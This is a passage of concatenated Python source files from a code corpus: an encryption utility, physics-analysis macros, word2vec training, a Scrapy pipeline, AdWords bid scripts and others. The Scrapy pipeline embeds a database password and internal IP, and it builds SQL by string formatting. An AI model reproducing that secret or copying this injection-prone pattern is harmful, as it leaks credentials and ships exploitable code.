\"{}\"'.format(key))\n return None\n\nclass Roland:\n #cmdline utility class\n #if claptrap.py is not imported as a module\n modes=['enc','dec']\n tmpdir='.tmp'\n def __init__(self):\n self.tmpdir=os.path.join(os.environ['HOME'],self.tmpdir)\n\n def cmdline(self):\n parser=argparse.ArgumentParser()\n args={\n 'datafile':{'short':'-d','long':'--datafile','help':'unencrypted data file','req':'yes'},\n 'edatafile':{'short':'-e','long':'--eDatafile','help':'encrypted data file','req':'yes'},\n 'keyfile':{'short':'-k','long':'--keyfile','help':'file containing keys to eDatafile','req':'yes'},\n 'password':{'short':'-p','long':'--password','help':'password to lock keyfile','req':'yes'},\n 'mode':{'short':'-m','long':'--mode','help':'dec or enc','req':'yes'},\n }\n for key in args.keys():\n parser.add_argument(args[key]['short'],args[key]['long'],help=args[key]['help'],required=args[key]['req'])\n\n options=parser.parse_args()\n return options\n\n def mkkeynames(self,keyfile,mode):\n kf=os.path.join(self.tmpdir,os.path.basename(keyfile)+'_tmp.json')\n ekf=os.path.join(self.tmpdir,os.path.basename(keyfile)+'_tmp.eJson')\n if os.path.exists(self.tmpdir):\n shutil.rmtree(self.tmpdir)\n os.mkdir(self.tmpdir)\n if mode == 'dec':\n if not os.path.exists(keyfile):\n print('keyfile does not exist')\n return None\n \n if not os.path.isfile(keyfile):\n print('keyfile is not a file')\n return None\n\n with open(keyfile,'rb') as kfp, open(ekf,'wb') as ekfp:\n while True:\n d=kfp.read(512)\n if not d:\n break\n ekfp.write(d)\n return kf,ekf\n elif mode == 'enc':\n return kf,keyfile\n\n def permissions_read(self,name):\n d=os.path.dirname(name)\n if d == '':\n d='.'\n if not os.path.exists(d):\n return False,'{} : does not exist!'.format(d)\n\n uid=os.getuid()\n if uid == 0:\n return True,''\n gid=os.getgid()\n\n st=os.stat(d)\n if uid == st.st_uid:\n status=bool(st.st_mode & stat.S_IRUSR)\n else:\n status=False\n if status 
== False:\n status=bool(st.st_mode & stat.S_IRGRP)\n if status == False:\n status=bool(st.st_mode & stat.S_IROTH)\n return status,''\n\n def permissions_write(self,name):\n d=os.path.dirname(name)\n if d == '':\n d='.'\n if not os.path.exists(d):\n return False,'{} : does not exist!'.format(d)\n uid=os.getuid()\n if uid == 0:\n return True,''\n gid=os.getgid()\n\n st=os.stat(d)\n if uid == st.st_uid:\n status=bool(st.st_mode & stat.S_IWUSR)\n else:\n status=False\n if status == False:\n status=bool(st.st_mode & stat.S_IWGRP)\n if status == False:\n status=bool(st.st_mode & stat.S_IWOTH)\n return status,''\n\n def ops(self):\n zero=Zero()\n options=self.cmdline()\n if options.mode in self.modes:\n options.datafile=os.path.expanduser(options.datafile)\n options.eDatafile=os.path.expanduser(options.eDatafile)\n options.keyfile=os.path.expanduser(options.keyfile)\n #check to see if user can read/write to locations above\n checks=[\n [options.keyfile,self.permissions_read],\n [options.keyfile,self.permissions_write],\n [options.datafile,self.permissions_read],\n [options.datafile,self.permissions_write],\n [options.eDatafile,self.permissions_read],\n [options.eDatafile,self.permissions_write],\n ]\n for name,call in checks:\n result=call(name)\n if result[0] == False:\n if result[1] == '':\n print('permissions might not permit operation! aborting! {} : {}'.format(name,result[0]))\n else:\n print(result[1])\n return None\n\n if options.mode == 'enc':\n ks=self.mkkeynames(options.keyfile,'enc')\n keyfile=ks[0]\n eKeyfile=ks[1]\n key=zero.fixKey(options.password)\n if key != None:\n stat=zero.simpleRunE(key,options.datafile,options.eDatafile,keyfile,eKeyfile)\n elif options.mode == 'dec':\n ks=self.mkkeynames(options.keyfile,'dec')\n if ks != None:\n keyfile=ks[0]\n eKeyfile=ks[1]\n key=zero.fixKey(options.password)\n if key != None:\n stat=zero.simpleRunD(key,options.datafile,options.eDatafile,keyfile,eKeyfile)\n if stat == True:\n try:\n os.remove(options.keyfile)\n except OSError as err:\n print('whoopsie! 
looks like you can\'t delete the keyfile!\\n',err)\n            shutil.rmtree(self.tmpdir)\n        else:\n            print('use \"dec\" or \"enc\"!')\n\nif __name__ == '__main__':\n    commander=Roland()\n    commander.ops()\n","sub_path":"claptrap/claptrap.py","file_name":"claptrap.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"646129796","text":"import glob\nimport json\n\nfrom sys import argv, exit\nimport os\n\n\ndef sortKeyFunc(s):\n    return int(os.path.basename(s)[8:-5])\n\ndef main():\n\n    try:\n        # set parameters\n        Low = int(argv[1]) \n        High = int(argv[2])\n        jobFolder = str(argv[3])\n\n    except (IndexError, ValueError):\n        print('Did not set number of files or jobs!')\n        exit()\n\n    ###############################\n    # SET PATHS and load HYDRO DATA\n\n    CONF = json.load(open(\"Configure.json\", \"r\"))\n    WORKING_FOLDER = CONF[\"workingFolder\"]\n    ALICE_DATA_PATH = CONF[\"aliceFolder\"]\n\n    PT = ALICE_DATA_PATH + \"/fullPtRange.json\"\n\n    workFolderPion = WORKING_FOLDER + \"/interpolation/JOBS/\" + jobFolder + \"/pion/\" \n    workFolderKaon = WORKING_FOLDER + \"/interpolation/JOBS/\" + jobFolder + \"/kaon/\" \n    workFolderProton = WORKING_FOLDER + \"/interpolation/JOBS/\" + jobFolder + \"/proton/\" \n\n    # LOAD GRID DATA\n    SpectraPathPion = glob.glob(WORKING_FOLDER + \"/JOBS/job-*/pion/spectra_*\")\n    SpectraPathKaon = glob.glob(WORKING_FOLDER + \"/JOBS/job-*/kaon/spectra_*\")\n    SpectraPathProton = glob.glob(WORKING_FOLDER + \"/JOBS/job-*/proton/spectra_*\")\n\n    ###############################\n    # load Alice DATA \n\n    PionAlicePT = ALICE_DATA_PATH + \"/pion/pt_pi0139plu.json\"\n    KaonAlicePT = ALICE_DATA_PATH + \"/kaon/pt_Ka0492plu.json\"\n    ProtonAlicePT = ALICE_DATA_PATH + \"/proton/pt_pr0938plu.json\"\n\n    ###############################\n    # Sort ascending 1,2,3...\n\n    SpectraPathPion.sort(key=sortKeyFunc)\n    SpectraPathKaon.sort(key=sortKeyFunc)\n    SpectraPathProton.sort(key=sortKeyFunc)\n\n    FILES1 = SpectraPathPion[Low-1:High]\n    FILES2 = SpectraPathKaon[Low-1:High]\n    FILES3 = SpectraPathProton[Low-1:High]\n\n    ################################\n    # MACROS commands\n\n    graph = \"python \" + WORKING_FOLDER + \"/interpolation/MACROS/graph/make_graph.py \"\n    fit = \"python \" + WORKING_FOLDER + \"/interpolation/MACROS/fit/make_fit.py \"\n    chi = \"python \" + WORKING_FOLDER + \"/interpolation/MACROS/chi/make_chi_square_batch_05.py \" + WORKING_FOLDER + \" \"\n    writeToTree = \"python \" + WORKING_FOLDER + \"/interpolation/MACROS/chi/write_to_tree_05.py \" + WORKING_FOLDER + \"/interpolation/JOBS/ \" + jobFolder\n\n\n    for iFile in FILES1:\n\n        GraphFile = workFolderPion + \"graph_\" + iFile.rsplit('/', 1)[1].split(\".\")[0] + \".root\"\n        EvalGraphFile = workFolderPion + \"eval_fit_graph_\" + iFile.rsplit('/', 1)[1].split(\".\")[0] + \".json\"\n\n        commandGraph = graph + workFolderPion + \" \" + PT + \" \" + iFile + \" -b\" # the iFile gives the index in output\n        commandFit = fit + workFolderPion + \" \" + GraphFile + \" \" + PionAlicePT + \" -b\"\n        commandCHI = chi + workFolderPion + \" \" + str(1) + \" \" + EvalGraphFile + \" \" + iFile + \" -b\" # 1 = PION\n        \n        os.system(commandGraph) \n        os.system(commandFit) \n        os.system(commandCHI) \n\n    os.system(writeToTree + \" pion\") \n    \n    for iFile in FILES2:\n\n        GraphFile = workFolderKaon + \"graph_\" + iFile.rsplit('/', 1)[1].split(\".\")[0] + \".root\"\n        EvalGraphFile = workFolderKaon + \"eval_fit_graph_\" + 
iFile.rsplit('/', 1)[1].split(\".\")[0] + \".json\"\n\n        commandGraph = graph + workFolderKaon + \" \" + PT + \" \" + iFile + \" -b\"\n        commandFit = fit + workFolderKaon + \" \" + GraphFile + \" \" + KaonAlicePT + \" -b\"\n        commandCHI = chi + workFolderKaon + \" \" + str(2) + \" \" + EvalGraphFile + \" \" + iFile + \" -b\" # 2 = KAON\n        \n        os.system(commandGraph) \n        os.system(commandFit) \n        os.system(commandCHI) \n\n    os.system(writeToTree + \" kaon\") \n    \n    for iFile in FILES3:\n\n        GraphFile = workFolderProton + \"graph_\" + iFile.rsplit('/', 1)[1].split(\".\")[0] + \".root\"\n        EvalGraphFile = workFolderProton + \"eval_fit_graph_\" + iFile.rsplit('/', 1)[1].split(\".\")[0] + \".json\"\n\n        commandGraph = graph + workFolderProton + \" \" + PT + \" \" + iFile + \" -b\"\n        commandFit = fit + workFolderProton + \" \" + GraphFile + \" \" + ProtonAlicePT + \" -b\"\n        commandCHI = chi + workFolderProton + \" \" + str(3) + \" \" + EvalGraphFile + \" \" + iFile + \" -b\" # 3 = PROTON\n        \n        os.system(commandGraph) \n        os.system(commandFit) \n        os.system(commandCHI) \n\n    os.system(writeToTree + \" proton\") \n    \n\nmain()\n","sub_path":"RunGrid-Cent05/interpolation/do_macros_05.py","file_name":"do_macros_05.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"341744618","text":"import sys\nimport os\nimport logging\nimport pathlib\nimport numpy as np\nimport pdb\nfrom gensim.models import word2vec\nimport tensorflow as tf\nfrom tensorflow.contrib.tensorboard.plugins import projector\nimport gensim\n\n# def save_seg_data(brc_data, tar_dir):\n#     \"\"\"\n#     Join the question tokens and the passage tokens with spaces and write them to the segmented_dir folder; the resulting files get the .seg suffix\n#     :param brc_data:\n#     :param tar_dir:\n#     :return:\n#     \"\"\"\n#     # print('Converting ' + file)\n#     # fin = open(file, encoding='utf8')\n#     out_file = os.path.join(tar_dir, 'train_set.seg')\n#     with open(out_file, 'w', encoding='utf8') as ftrain:\n#         for sample in brc_data.train_set:\n#             ftrain.write(' '.join(sample['segmented_question']) + '\\n')\n#             for passage in sample['passages']:\n#                 ftrain.write(' '.join(passage['passage_tokens']) + '\\n')\n#             del sample\n#     ftrain.close()\n#\n#     out_file = os.path.join(tar_dir, 'dev_set.seg')\n#     with open(out_file, 'w', encoding='utf8') as fdev:\n#         for sample in brc_data.dev_set:\n#             fdev.write(' '.join(sample['segmented_question']) + '\\n')\n#             for passage in sample['passages']:\n#                 fdev.write(' '.join(passage['passage_tokens']) + '\\n')\n#             del sample\n#     fdev.close()\n#\n#     out_file = os.path.join(tar_dir, 'test_set.seg')\n#     with open(out_file, 'w', encoding='utf8') as ftest:\n#         for sample in brc_data.test_set:\n#             ftest.write(' '.join(sample['segmented_question']) + '\\n')\n#             for passage in sample['passages']:\n#                 ftest.write(' '.join(passage['passage_tokens']) + '\\n')\n#             del sample\n#     ftest.close()\n\n\ndef pre_train(segmented_dir, embed_size):\n    \"\"\"\n    Train word vectors on the training corpus. Could also consider the full corpus plus the Baidu Zhidao dataset??\n    :param brc_data:\n    :param segmented_dir:\n    :return:\n    \"\"\"\n\n    sys.path.append('..')\n    # Save the tokenized results of the raw data\n    # save_seg_data(brc_data, segmented_dir)\n\n    program = os.path.basename(sys.argv[0])\n    logger = logging.getLogger(program)\n    logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s')\n    logging.root.setLevel(level=logging.INFO)\n    logger.info(\"running %s\" % ' '.join(sys.argv))\n\n    # The corpus here has been preprocessed into multiple files; PathLineSentences supports several large files and is memory-friendly.\n    # If the corpus is a single large file, load it with the LineSentence(file) class instead, which is equally memory-friendly.\n    # default embed_size=300\n    model = word2vec.Word2Vec(word2vec.PathLineSentences(segmented_dir), 
size=embed_size, min_count=2, workers=12, iter=10)\n    # Save the native gensim model under its own name so the plain-text dump below does not overwrite it\n    model.save(os.path.join(segmented_dir, 'w2v.model'))\n    with open(os.path.join(segmented_dir, 'w2v_dic.data'), 'w', encoding='utf-8') as f:\n        # word2vec text-format header (vocab size and vector dimension), required by load_word2vec_format\n        f.write('{} {}\\n'.format(len(model.wv.vocab), embed_size))\n        for word in model.wv.vocab:\n            f.write(word + ' ')\n            f.write(' '.join(list(map(str, model.wv[word]))))\n            f.write('\\n')\n\n# Evaluate the quality of the pre-trained embeddings\ndef check_word2vec():\n    \"\"\"\n    Sanity-check the trained vectors by inspecting the vocabulary and nearest neighbours.\n    :return:\n    \"\"\"\n    model = gensim.models.KeyedVectors.load_word2vec_format('./w2v_dic.data', binary=False, unicode_errors='ignore')\n    val = model.wv.vocab\n    index2word = model.index2word\n    vectors = model.vectors\n    print(index2word[2000])\n    print(model.most_similar('喷子'))\n    # model.most_similar(positive=['woman', 'king'], negative=['man'], topn=1)\n\n#gensim.scripts.word2vec2tensor\ndef gen_metadata_for_tensorboard():\n    \"\"\"\n    To use TensorBoard, the trained word vectors need some processing.\n    The main task is to store the embeddings as a tf Variable.\n\n    After running the program:\n    tensorboard --logdir=metadata_dir\n\n    Tested; works correctly.\n    :return: \n    \"\"\"\n    from tqdm import tqdm\n    word2vec_path = \"\"\n    word2vec_name = \"\"\n    save_metadata_dir = \"\"\n    word2vec_file = os.path.join(word2vec_path, word2vec_name)\n    with open(word2vec_file, 'r') as f:\n        header = f.readline() # vocab size and vector dimensionality\n        vocab_size, vector_size = map(int, header.split())\n        words, embeddings = [], []\n        for _ in tqdm(range(vocab_size)):\n            word_list = f.readline().split(' ')\n            word = word_list[0]\n            vector = word_list[1:]\n            words.append(word)\n            embeddings.append(np.array(vector))\n\n    # Convert the word vectors into the format TensorBoard needs\n    with tf.Session() as sess:\n        # tf.assign(): an example of assigning concrete values (i.e. the embedding matrix) to a tf Variable:\n        embed_matrix = tf.Variable([0.0], name='embedding')\n        place = tf.placeholder(tf.float32, shape=[len(words), vector_size])\n        set_x = tf.assign(embed_matrix, place, validate_shape=False)\n        sess.run(tf.global_variables_initializer())\n        sess.run(set_x, feed_dict={place: embeddings})\n\n        # # A metadata file is needed to assign every word in the vocabulary an identity\n        with open(os.path.join(save_metadata_dir, \"metadata.tsv\"), 'w') as f:\n            for word in tqdm(words):\n                f.write(word + '\\n')\n\n        saver = tf.train.Saver()\n        save_path = saver.save(sess, \"model_dir/model.ckpt\")\n        print(\"Model saved in path: %s\" % save_path)\n        # Write the TensorFlow summary\n        summary_writer = tf.summary.FileWriter(save_metadata_dir, sess.graph)\n        config = projector.ProjectorConfig()\n        embedding_conf = config.embeddings.add()\n        embedding_conf.tensor_name = 'embedding'\n        embedding_conf.metadata_path = 'metadata.tsv' # mind the path here, or an error like the following may occur\n        #\"/data/liujiepeng/NLP/MachineComprehension/DuReader/data/DuReader2.0/segmented/metadata_dir/./metadata_dir/metadata.tsv\" not found, or is not a file\n        projector.visualize_embeddings(summary_writer, config)\n\n    # Save the model\n    # the words and the vectors of the word2vec model go into the metadata and ckpt files respectively\n    saver = tf.train.Saver()\n    saver.save(sess, os.path.join(save_metadata_dir, \"model.ckpt\"))\n\n\n\ndef gen_tensorboard_from_w2vdata():\n    \"\"\"\n    Convert existing word vectors into data that TensorBoard can render.\n    Mainly generates the model file (holding the points) and the metadata file (holding each point's label).\n    Tested; works correctly.\n    :return:\n    \"\"\"\n    model_path = \"\"\n    model_name = \"\"\n    model = gensim.models.KeyedVectors.load_word2vec_format('./w2v_dic.data', binary=False, unicode_errors='ignore')\n    max_size = len(model.wv.vocab) # why subtract 1??\n    vocab_size = len(model.vocab)\n    print(\"max_size=\", max_size)\n    print(\"vocab_size=\", vocab_size)\n    print(\"model.vector_size=\", model.vector_size)\n    w2v = np.zeros((max_size, model.vector_size))\n    # Save the vocabulary\n    path = \"tensorboard\"\n    with open(os.path.join(path, \"metadata.tsv\"), \"w+\", encoding='utf-8') as file_metadata:\n        for i, word in enumerate(model.wv.index2word[:max_size]):\n            w2v[i] = 
model.wv[word]\n            file_metadata.write(word + \"\\n\")\n\n    sess = tf.InteractiveSession()\n    with tf.device(\"/cpu:0\"):\n        embedding = tf.Variable(w2v, trainable=False, name=\"embedding\") # store the embedding\n        sess.run(tf.global_variables_initializer())\n\n    saver = tf.train.Saver()\n    writer = tf.summary.FileWriter(path, sess.graph)\n    config = projector.ProjectorConfig()\n    embed = config.embeddings.add()\n    embed.tensor_name = \"embedding\" # the name here must match the variable above\n    embed.metadata_path = \"metadata.tsv\"\n    projector.visualize_embeddings(writer, config)\n    saver.save(sess, path + \"/model.ckpt\", global_step=max_size)\n\n\ndef word2vec_visualize():\n    \"\"\"\n\n    Tested; works correctly.\n    :return:\n    \"\"\"\n    model_path = \"./w2v_dic.data\"\n    output_path = \"./metadata_dir\"\n    model = gensim.models.KeyedVectors.load_word2vec_format(model_path)\n    pathlib.Path(output_path).mkdir(parents=True, exist_ok=True)\n    meta_file = \"metadata.tsv\"\n    placeholder = np.zeros((len(model.wv.index2word), model.vector_size))\n\n    with open(os.path.join(output_path, meta_file), 'wb') as file_metadata:\n        for i, word in enumerate(model.wv.index2word):\n            placeholder[i] = model.wv[word]\n            if word == '':\n                print(\"Empty line; writing a placeholder label instead, otherwise it triggers a TensorBoard bug\")\n                file_metadata.write(\"{0}\".format('<Empty Line>').encode('utf-8') + b'\\n')\n            else:\n                file_metadata.write(\"{0}\".format(word).encode('utf-8') + b'\\n')\n\n    # define the model without training\n    sess = tf.InteractiveSession()\n\n    embedding = tf.Variable(placeholder, trainable=False, name='metadata')\n    tf.global_variables_initializer().run()\n\n    saver = tf.train.Saver()\n    writer = tf.summary.FileWriter(output_path, sess.graph)\n\n    # adding into projector\n    config = projector.ProjectorConfig()\n    embed = config.embeddings.add()\n    embed.tensor_name = 'metadata'\n    embed.metadata_path = meta_file\n\n    # Specify the width and height of a single thumbnail.\n    projector.visualize_embeddings(writer, config)\n    saver.save(sess, os.path.join(output_path, 'metadata.ckpt'))\n    print('Run `tensorboard --logdir={0}` to visualize the result in TensorBoard'.format(output_path))\n\nif __name__ == '__main__':\n    check_word2vec()","sub_path":"utils/pretrain_embedding.py","file_name":"pretrain_embedding.py","file_ext":"py","file_size_in_byte":9426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"185133779","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport cx_Oracle\n\n\nclass HnPipeline(object):\n    def __init__(self):\n        pass\n\n    def open_spider(self, spider):\n        self.db = cx_Oracle.connect('idg_baochi/IdgBaochi2019@10.193.79.94/orclpdb1', encoding=\"UTF-8\",\n                                    nencoding=\"UTF-8\")\n\n    def close_spider(self, spider):\n        self.db.close()\n\n    def process_item(self, item, spider):\n        cursor = self.db.cursor()\n        cursor.setinputsizes(content=cx_Oracle.CLOB)\n        sql = \"INSERT INTO news(id,\\\n               title, publisher, publish_date, province,link,description,content,num_like,num_share, tags, topic) \\\n               VALUES ( '%s','%s', '%s', TO_DATE('%s', 'yyyy/mm/dd hh24:mi:ss'), '%s' , '%s' , '%s' , :content, %d, %d, '%s', '%s')\" % \\\n              (str(item[\"id\"]), str(item[\"title\"]), str(item[\"publisher\"]), str(item[\"publish_date\"]),\n               str(item[\"province\"]),\n               str(item[\"url\"]), str(item[\"description\"]), item[\"num_like\"], item[\"num_share\"],\n               item[\"tags\"],item[\"topic\"])\n        try:\n            
cursor.execute(sql, content=item[\"content\"])\n self.db.commit()\n except Exception as e:\n print(e)\n print(item)\n self.db.rollback()\n finally:\n cursor.close()\n return item\n","sub_path":"hn/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"328728293","text":"\"\"\"Main executable of the WeatherStation simulator.\"\"\"\nimport asyncio\nimport json\nfrom lsst.ts import weatherstation\n\nsimulator_config_path = '/home/saluser/config/config.json'\n\nasync def main():\n with open(simulator_config_path) as f:\n simulator_config = json.loads(f.read())\n\n if 'WeatherStation' in simulator_config.keys():\n awaitables = []\n for weatherstation_config in simulator_config['WeatherStation']:\n if weatherstation_config['source'] == 'command_sim':\n salindex = None\n if 'index' in weatherstation_config:\n salindex = weatherstation_config['index']\n print('WeatherStation csc | Launching salindex = {}'.format(salindex))\n csc = weatherstation.csc.CSC(salindex, simulation_mode=True)\n awaitables.append(csc.done_task)\n await asyncio.wait(awaitables)\n\nasyncio.run(main())","sub_path":"csc_sim/weatherstation.py","file_name":"weatherstation.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"317131941","text":"from googleads import adwords\r\n\r\nPAGE_SIZE = 100\r\nclient = adwords.AdWordsClient.LoadFromStorage()\r\n\r\n\r\ndef main():\r\n # Initialize appropriate service.\r\n campaign_service = client.GetService('CampaignService', version='v201809')\r\n\r\n # Construct selector and get all campaigns.\r\n offset = 0\r\n selector = {\r\n 'fields': ['Id'],\r\n 'paging': {\r\n 'startIndex': str(offset),\r\n 'numberResults': str(PAGE_SIZE)\r\n }\r\n }\r\n\r\n more_pages = True\r\n while more_pages:\r\n page = campaign_service.get(selector)\r\n\r\n # Display results.\r\n if 'entries' in page:\r\n for campaign in page['entries']:\r\n print(campaign)\r\n print(\"***********\")\r\n # print('Campaign with id \"%s\", name \"%s\", and status \"%s\" was '\r\n # 'found.' 
% (campaign['id'], campaign['name'],\r\n # campaign['status']))\r\n else:\r\n print('No campaigns were found.')\r\n offset += PAGE_SIZE\r\n selector['paging']['startIndex'] = str(offset)\r\n more_pages = offset < int(page['totalNumEntries'])\r\n\r\n\r\n# def update_campaign_labels(campaign_id,operation, labels):\r\n# # Initialize appropriate service.\r\n# campaign_service = client.GetService('CampaignService', version='v201809')\r\n#\r\n# # Construct operations and update campaign.\r\n#\r\n# label_service = client.GetService('LabelService',version='v201809')\r\n# label_id=None\r\n# try:\r\n# LabelOperation=[{\r\n# 'operator': operation,\r\n# 'operand': {'xsi_type':'TextLabel','name': labels}\r\n# }]\r\n# response=label_service.mutate(LabelOperation)\r\n# label_id=response['value'][0]['id']\r\n# print(response['value'][0]['id'])\r\n# except Exception as e:\r\n# print(e)\r\n# print(\"Sorry Try again.\")\r\n# a=CampaignPerformanceReportModel.objects.get(Labels__icontains=labels).LabelIds\r\n# print(a)\r\n# else:\r\n# operations = [{\r\n# 'operator': operation,\r\n# 'operand': {\r\n# 'campaignId': campaign_id,\r\n# 'labelId': label_id\r\n# }\r\n# }]\r\n# result=campaign_service.mutateLabel(operations)\r\n# #print(result)\r\n\r\ndef setCPCbids(id, bid_micro_amount):\r\n # Initialize appropriate service.\r\n ad_group_service = client.GetService('AdGroupService', version='v201809')\r\n\r\n # Construct operations and update an ad group.\r\n operations = [{\r\n 'operator': 'SET',\r\n 'operand': {\r\n 'id': id\r\n }\r\n }]\r\n\r\n if bid_micro_amount:\r\n operations[0]['operand']['biddingStrategyConfiguration'] = {\r\n 'bids': [{\r\n 'xsi_type': 'CpcBid',\r\n 'bid': {\r\n 'microAmount': bid_micro_amount,\r\n }\r\n }]\r\n }\r\n\r\n ad_group_service.mutate(operations)\r\n\r\n\r\ndef setCPMbids(id, bid_micro_amount):\r\n # Initialize appropriate service.\r\n ad_group_service = client.GetService('AdGroupService', version='v201809')\r\n\r\n # Construct operations and update an ad group.\r\n operations = [{\r\n 'operator': 'SET',\r\n 'operand': {\r\n 'id': id\r\n }\r\n }]\r\n\r\n if bid_micro_amount:\r\n operations[0]['operand']['biddingStrategyConfiguration'] = {\r\n 'bids': [{\r\n 'xsi_type': 'CpmBid',\r\n 'bid': {\r\n 'microAmount': bid_micro_amount,\r\n }\r\n }]\r\n }\r\n\r\n ad_group_service.mutate(operations)\r\n\r\n\r\ndef setCPAbids(id, bid_micro_amount):\r\n # Initialize appropriate service.\r\n ad_group_service = client.GetService('AdGroupService', version='v201809')\r\n\r\n # Construct operations and update an ad group.\r\n operations = [{\r\n 'operator': 'SET',\r\n 'operand': {\r\n 'id': id\r\n }\r\n }]\r\n\r\n if bid_micro_amount:\r\n operations[0]['operand']['biddingStrategyConfiguration'] = {\r\n 'bids': [{\r\n 'xsi_type': 'CpaBid',\r\n 'bid': {\r\n 'microAmount': bid_micro_amount,\r\n }\r\n }]\r\n }\r\n\r\n ad_group_service.mutate(operations)\r\n\r\n\r\ndef increaseCPCbids():\r\n temp_list = set()\r\n # Initialize appropriate service.\r\n ad_group_bid_modifier_service = client.GetService(\r\n 'AdGroupBidModifierService', version='v201809')\r\n\r\n # Get all ad group bid modifiers for the campaign.\r\n selector = {\r\n 'fields': ['CampaignName', 'CampaignId', 'AdGroupId', 'BidModifier', 'Id'],\r\n \"predicates\": {\r\n \"field\": \"CampaignStatus\",\r\n \"operator\": \"IN\",\r\n \"values\": [\r\n \"ENABLED\",\r\n \"PAUSED\",\r\n ]\r\n },\r\n\r\n }\r\n\r\n # Set initial values.\r\n # offset, page = 0, {}\r\n # more_results = True\r\n\r\n # while more_results:\r\n page = 
ad_group_bid_modifier_service.get(selector)\r\n    print(page)\r\n    #\r\n    # if page['entries']:\r\n    #     # break\r\n    #     for modifier in page['entries']:\r\n    #         print(modifier)\r\n    #         value = (modifier['bidModifier'] if 'bidModifier' in modifier\r\n    #                  else 'unset')\r\n    #         # print('Campaign ID %s, AdGroup ID %s, Criterion ID %s has ad group '\r\n    #         #       'level modifier: %s' %\r\n    #         #       (modifier['campaignId'], modifier['adGroupId'],\r\n    #         #        modifier['criterion']['id'], value))\r\n    #         temp_list.add(modifier['campaignId'])\r\n    #\r\n    #         # Increment values to request the next page.\r\n    #         # offset += PAGE_SIZE\r\n    #         # selector['paging']['startIndex'] = str(offset)\r\n    #     else:\r\n    #         print('No ad group bid modifiers returned.')\r\n    #     # more_results = int(page['totalNumEntries']) > offset\r\n    # print(\"campaign ids: \", temp_list)\r\n\r\n\r\nif __name__ == '__main__':\r\n    adwords_client = adwords.AdWordsClient.LoadFromStorage(\"/home/oem/Documents/va8ive/googleadwordssamad/google-ads.yaml\")\r\n    # main(adwords_client)\r\n    # update_campaign_labels('6454212146', 'AD-D', 'Usa')\r\n    setCPCbids('75822879265', 50000000)\r\n    setCPMbids('75822879265', 50000000)\r\n    setCPAbids('75822879265', 50000000)\r\n    increaseCPCbids()\r\n\r\n# Campaign ID 2030405009, AdGroup ID 72728417180, Criterion ID 30000 has ad group level modifier: None\r\n","sub_path":"googleadwordssamad/Adwords-Automation/get_campaign.py","file_name":"get_campaign.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"645967601","text":"from mercurial.ui import ui as hgui\nfrom mercurial.hg import repository\n\ndef extract_stats(path, seen=None):\n    if seen is None:\n        seen = set()\n\n    ui = hgui()\n    repo = repository(ui, path)\n\n    for rev in repo:\n        ctx = repo[rev]\n        if ctx.hex() in seen:\n            continue\n\n        yield (ctx.hex(), \n               [ctx.user()], \n               ctx.date(), \n               ctx.description(),\n               [p.hex() for p in ctx.parents()])\n","sub_path":"vcsstatslib/vcs/hg.py","file_name":"hg.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"389800839","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\"\"\"\nImplement a function count_holes(n)\nthat takes one argument -- an integer, or a string containing an integer,\nand returns an integer -- the number of \"holes\" in the decimal notation of that number in printed digits (assume \"4\" and \"0\" have one hole each), or the string ERROR if the argument does not meet the requirements: it is a float, or not a number at all.\n\"\"\"\ndef count_holes(n):\n\tdict_num = {'-': 0, '0': 1, '1': 0, '2': 0, '3': 0, '4': 1, '5': 0, '6': 1, '7': 0, '8': 2, '9': 1}\n\tstr_num = '-0123456789'\n\tcounter = 0\n\tif len(str(n)) != 0:\n\t\tfor k in str(n):\n\t\t\tif k not in str_num:\n\t\t\t\treturn 'ERROR'\n\t\ta = str(int(n))\n\t\tfor i in a:\n\t\t\tcounter = counter + dict_num[i]\n\telse: \n\t\treturn 'ERROR'\n\tif type(n) == float:\n\t\treturn 'ERROR'\n\treturn counter\n","sub_path":"Prometheus/lect6_1.py","file_name":"lect6_1.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"629678336","text":"import json\nimport collections\nimport pprint\n\nfrom django.shortcuts import render, get_object_or_404\nfrom django.contrib import messages\n\nfrom linker.forms import AddDataForm, AddPathwayForm\nfrom linker.models import Analysis, AnalysisData\nfrom linker.reactome import 
get_species_dict\nfrom linker.views.functions import reactome_mapping, save_analysis\nfrom linker.constants import GENOMICS, PROTEOMICS, METABOLOMICS, REACTIONS, PATHWAYS, \\\n DataRelationType, COMPOUND_DATABASE_CHEBI, COMPOUND_DATABASE_KEGG\n\n\ndef settings(request, analysis_id):\n analysis = get_object_or_404(Analysis, pk=analysis_id)\n species_dict = get_species_dict()\n\n # here we also set the species field to the first species of this analysis\n form = AddDataForm()\n inv_map = {v: k for k, v in species_dict.items()}\n first_species = analysis.metadata['species_list'][0]\n idx = inv_map[first_species]\n form.fields['species'].initial = idx\n\n context = {\n 'analysis_id': analysis.pk,\n 'form': form,\n }\n return render(request, 'linker/settings.html', context)\n\n\ndef add_data(request, analysis_id):\n if request.method == 'POST':\n analysis = get_object_or_404(Analysis, pk=analysis_id)\n species_dict = get_species_dict()\n form = AddDataForm(request.POST, request.FILES)\n if form.is_valid():\n database_id = form.cleaned_data['database_id']\n species = form.cleaned_data['species']\n species_list = [species_dict[species]]\n data_type = int(form.cleaned_data['data_type'])\n\n if data_type == GENOMICS:\n genes_str = get_formatted_data(analysis.metadata, 'genes_str', 